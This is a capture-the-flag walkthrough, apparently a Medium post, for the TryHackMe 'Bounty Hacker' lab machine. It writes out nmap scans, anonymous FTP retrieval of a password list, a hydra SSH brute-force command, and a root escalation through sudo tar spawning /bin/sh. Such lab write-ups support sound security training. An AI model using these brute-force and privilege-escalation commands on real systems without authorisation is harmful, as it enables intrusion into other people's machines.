TryHackMe: Bounty Hacker

  1. Deploy the machine.

2. Find open ports on the machine

Port scan

nmap -Pn <ip>

There’re 3 open ports: 21,22,80.

OS and service scan

nmap -A -p 21,22,80 <ip>

The OS is Ubuntu.

There’re 3 services:

21 ftp with anonymous login.22 ssh 80 http

Vuln scan

nmap --script vuln -p 21,22,80 <ip>

Access HTTP site (port 80)

There’re 3 name: spike, jet, and ed.

Let’s note it for possible usernames.

View page source. There’s /images/ directory.

Access it. nothing much

Access ftp port 21 with anonymous login

ftp <ip>Name: anonymous
ls -la

There’re 2 files: locks.txt and task.txt.

Download it

get locks.txtget task.txt

Read it

cat locks.txt

Seems like this is a password file.

Read task.txt

cat task.txt

3. Who wrote the task list?
The answer is from task.txt
ANS: l*n

4. What service can you bruteforce with the text file found?

Seems like there’s another possible username.

Let’s create users.txt first. There’re 5 usernames in total.

Bruteforce SSH on port 22

hydra -L users.txt -P locks.txt <ip> ssh -t 4 -u -F -V

SSH can be bruteforced.

5. What is the users password?
ANS: The answer is from #4.

6. user.txt

ssh lin@<ip>
ls -lacat user.txt

7. root.txt

Let’s do privilege escalation. I will check sudo first

sudo -l

Lucky enough I can use tar.

Looking up in GTFO

Run the command

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Let’s verify if I can escalate the priv.

id

Now I’m root.

cd /rootlscat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store